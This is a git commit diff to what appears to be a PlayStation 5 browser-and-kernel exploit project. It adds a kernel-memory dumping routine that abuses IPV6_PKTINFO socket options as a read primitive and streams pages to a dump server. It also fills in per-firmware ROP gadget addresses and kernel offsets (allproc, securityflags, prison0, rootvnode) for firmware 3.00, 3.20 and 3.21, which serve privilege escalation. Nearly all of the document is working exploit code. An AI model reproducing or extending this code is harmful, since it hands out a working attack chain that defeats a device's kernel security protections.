wip:

- 3.00 offset
- 3.20 missing offset.
- 3.21 offsets
- dumper logic that might work.

Author: CC

README.md

@@ -12,7 +12,7 @@ Exploit should now support the following firmwares:
 - 3.00 (partially)
 - 3.10 (partially)
 - 3.20
-- 3.21 (potentially partially)
+- 3.21
 - 4.00 (potentially partially)
 - 4.02 (potentially partially)
 - 4.03

document/en/ps5/exploit.js

@@ -18,7 +18,7 @@ const fw_str = navigator.userAgent.substring(fw_idx, fw_idx+4);
 
 //load offsets & webkit exploit after.
 if(!supportedFirmwares.includes(fw_str)) {
-    alert("This firmware is not supported.");
+    alert(`This firmware(${fw_str}) is not supported.`);
     throw new Error("");
 }
 
@@ -883,6 +883,8 @@ async function userland() {
                 if(kqueue_test == 0x6575716B) {
                     alert(`OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD == 0x${(cur_read.low & 0xFFFF).toString(16)}
                          add this offset to the firmware's file, reboot and dump the readable segment of the kernel.`);
+                         kqueue_data_addr = cur_read;
+                         break;
                 }
             }
         }
@@ -917,7 +919,20 @@ async function userland() {
                 await kread(test_addr.add32(i));
                 cur_read = p.read8(read_buf_store);
 
-                if ((cur_read.low & 0xFFFF) == OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD) {
+                if(OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD == 0){
+                    //improve offset discovery mode?
+                    if(cur_read.hi == 0xFFFFFFFF && cur_read.low >= 0x80000000 && cur_read.low <= 0xFF000000) {
+                        await kread(cur_read);
+                        let kqueue_test = p.read4(read_buf_store);
+                        if(kqueue_test == 0x6575716B) {
+                            alert(`OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD == 0x${(cur_read.low & 0xFFFF).toString(16)}
+                                 add this offset to the firmware's file, reboot and dump the readable segment of the kernel.`);
+                                 kqueue_data_addr = cur_read;
+                                 break;
+                        }
+                    }
+                }
+                else if ((cur_read.low & 0xFFFF) == OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD) {
                     kqueue_data_addr = cur_read;
                     found_kqueue_data_addr = 1;
                     await log("[+] Retry " + tries.toString(10) + " found kqueue .data address: 0x" + kqueue_data_addr.toString(16) + " (found @ i = 0x" + i.toString(16) + ")");
@@ -939,6 +954,58 @@ async function userland() {
 
     //TODO: check next kernel offsets if == 0 start dump mode?
     //find base readable segment -> send over socket
+    if(OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE == 0) {
+        let known_d0 = 0x00000001;
+        let known_d1 = 0x00000001;
+        let known_d2 = 0x00000000;
+        let known_d3 = 0x00000000;
+        //wildcard
+        let known_d5 = 0xFFFFFFFF;
+        let known_d6 = 0x00000008;
+        let known_d7 = 0x00000000;
+        let data_guess = kqueue_data_addr.and32(0xFFFFF000);
+        for(let i = 0;; i++) {
+            await kread(data_guess);
+    
+            let q0 = p.read8(read_buf_store);
+            let q1 = p.read8(read_buf_store.add32(0x8))
+    
+            if(q0.low != known_d0 || q0.hi != known_d1 || q1.low != known_d2 || q1.hi != known_d3) {
+                data_guess.sub32inplace(0x1000);
+                continue;
+            }
+
+            await kread(data_guess.add32(0x14));
+    
+            let q2 = p.read8(read_buf_store);
+            let q3 = p.read8(read_buf_store.add32(0x8))
+    
+            if(q2.low != known_d5 || q2.hi != known_d6 || q3.low != known_d7) {
+                data_guess.sub32inplace(0x1000);
+                continue;
+            }
+    
+            alert(`kqueue string: ${kqueue_data_addr} .rodata: ${data_guess} offset masked: -(${i * 0x1000}) ; .start offset: ${i * 0x1000 + 0x10000}`);
+            break;
+        }
+        let dump_base = data_guess.sub32(0x10000);
+
+        alert(`going to dump the kernel, make sure you set your own ip & that the dump server is running`);
+        for (let j = 0; ; j++) {
+            for (let i = 0; i < 0x1000; i += 0x10) {
+                chain.push_write8(write_victim_buf_store.add32(0x00), dump_base.add32(i));
+                chain.push_write8(write_victim_buf_store.add32(0x08), 0);
+                chain.push_write4(write_victim_buf_store.add32(0x10), 0);
+                await chain.add_syscall(SYSCALL_SETSOCKOPT, master_sock, IPPROTO_IPV6, IPV6_PKTINFO, write_victim_buf_store, 0x14);
+                await chain.add_syscall(SYSCALL_GETSOCKOPT, victim_sock, IPPROTO_IPV6, IPV6_PKTINFO, read_large_store.add32(i), pktinfo_size_store);
+            }
+            await dump_net(read_large_store, 0x1000);
+            dump_base.add32inplace(0x1000);
+        }
+
+    }
+
+
 
     ///////////////////////////////////////////////////////////////////////
     // Stage 5: Make .data patches and patch ucred + cleanup sockets

document/en/ps5/offsets/3.00.js

@@ -373,7 +373,7 @@ let syscall_map = {
     0x2D2: 0x32750, // sys_workspace_ctrl
 };
 
-const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x0; //check
+const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x7301; //check
 const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE  = 0x0; //check
 const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE  = 0x0; //check
 const OFFSET_KERNEL_DATA_BASE_ALLPROC       = 0x0; //check

document/en/ps5/offsets/3.20.js

@@ -373,7 +373,7 @@ let syscall_map = {
     0x2D2: 0x32750, // sys_workspace_ctrl
 };
 
-const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x0;
+const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x6FEC;
 const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE  = 0x316FEC;
 const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE  = 0xEE6FEC;
 const OFFSET_KERNEL_DATA_BASE_ALLPROC       = 0x276DC58;

document/en/ps5/offsets/3.21.js

@@ -1,47 +1,47 @@
-const OFFSET_wk_vtable_first_element     = 0x00314880; //check
-const OFFSET_wk_memset_import            = 0x028DDEB8; //check
-const OFFSET_wk___stack_chk_guard_import = 0x028DDB98; //check
+const OFFSET_wk_vtable_first_element     = 0x00314880;
+const OFFSET_wk_memset_import            = 0x028DDEB8;
+const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
 
-const OFFSET_lk___stack_chk_guard        = 0x00069190; //check
-const OFFSET_lk_pthread_create_name_np   = 0x0002CED0; //check
-const OFFSET_lk_pthread_join             = 0x0002F460; //check
-const OFFSET_lk_pthread_exit             = 0x00020A80; //check
-const OFFSET_lk__thread_list             = 0x000601A8; //check
+const OFFSET_lk___stack_chk_guard        = 0x00069190;
+const OFFSET_lk_pthread_create_name_np   = 0x0002CED0;
+const OFFSET_lk_pthread_join             = 0x0002F460;
+const OFFSET_lk_pthread_exit             = 0x00020A80;
+const OFFSET_lk__thread_list             = 0x000601A8;
 
-const OFFSET_lc_memset                   = 0x00014B50; //check
-const OFFSET_lc_setjmp                   = 0x0005F940; //check
-const OFFSET_lc_longjmp                  = 0x0005F990; //check
+const OFFSET_lc_memset                   = 0x00014B50;
+const OFFSET_lc_setjmp                   = 0x0005F940;
+const OFFSET_lc_longjmp                  = 0x0005F990;
 
-const OFFSET_WORKER_STACK_OFFSET         = 0x0007FB88; //check
+const OFFSET_WORKER_STACK_OFFSET         = 0x0007FB88;
 
 let wk_gadgetmap = {
-    "ret"    : 0x00000042, //check
-    "pop rdi": 0x00107342, //check
-    "pop rsi": 0x00115923, //check
-    "pop rdx": 0x002FFDF2, //check
-    "pop rcx": 0x0009AC92, //check
-    "pop r8": 0x0024A59F, //check
-    "pop r9" : 0x00277B41, //check
-    "pop rax": 0x0002C827, //check
-    "pop rsp": 0x00099A22, //check
+    "ret"    : 0x00000042,
+    "pop rdi": 0x00107342,
+    "pop rsi": 0x00115923,
+    "pop rdx": 0x002FFDF2,
+    "pop rcx": 0x0009AC92,
+    "pop r8": 0x0024A59F,
+    "pop r9" : 0x00277B41,
+    "pop rax": 0x0002C827,
+    "pop rsp": 0x00099A22,
 
-    "mov [rdi], rsi": 0x00A2D658, //check
-    "mov [rdi], rax": 0x0003A79A, //check
-    "mov [rdi], eax": 0x0003A79B, //check
+    "mov [rdi], rsi": 0x00A2D658,
+    "mov [rdi], rax": 0x0003A79A,
+    "mov [rdi], eax": 0x0003A79B,
 
-    "infloop": 0x00007351, //check
+    "infloop": 0x00007351,
 
     //branching specific gadgets
-    "cmp [rcx], eax" : 0x00E4EF7B, //check
-    "sete al"        : 0x00022549, //check
-    "seta al"        : 0x0000C94F, //check
-    "setb al"        : 0x0015E348, //check
-    "setg al"        : 0x002F89AA, //check
-    "setl al"        : 0x000E0D91, //check
-    "shl rax, 3"     : 0x01A269F3, //check
-    "add rax, rdx"   : 0x016D5582, //check
-    "mov rax, [rax]" : 0x00047FEC, //check
-    "inc dword [rax]": 0x004971AA, //check
+    "cmp [rcx], eax" : 0x00E4EF7B,
+    "sete al"        : 0x00022549,
+    "seta al"        : 0x0000C94F,
+    "setb al"        : 0x0015E348,
+    "setg al"        : 0x002F89AA,
+    "setl al"        : 0x000E0D91,
+    "shl rax, 3"     : 0x01A269F3,
+    "add rax, rdx"   : 0x016D5582,
+    "mov rax, [rax]" : 0x00047FEC,
+    "inc dword [rax]": 0x004971AA,
 };
 
 //check
@@ -374,12 +374,12 @@ let syscall_map = {
     0x2D2: 0x32750, // sys_workspace_ctrl
 };
 
-const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x0; //check
-const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE  = 0x0; //check
-const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE  = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_ALLPROC       = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_QA_FLAGS      = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS  = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_PRISON0       = 0x0; //check
-const OFFSET_KERNEL_DATA_BASE_ROOTVNODE     = 0x0; //check
+const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD    = 0x702A;
+const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE  = 0x31702A;
+const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE  = 0xEE702A;
+const OFFSET_KERNEL_DATA_BASE_ALLPROC       = 0x276DC58;
+const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
+const OFFSET_KERNEL_DATA_BASE_QA_FLAGS      = 0x6466498;
+const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS  = 0x6466500;
+const OFFSET_KERNEL_DATA_BASE_PRISON0       = 0x1CC2670;
+const OFFSET_KERNEL_DATA_BASE_ROOTVNODE     = 0x67AB4C0;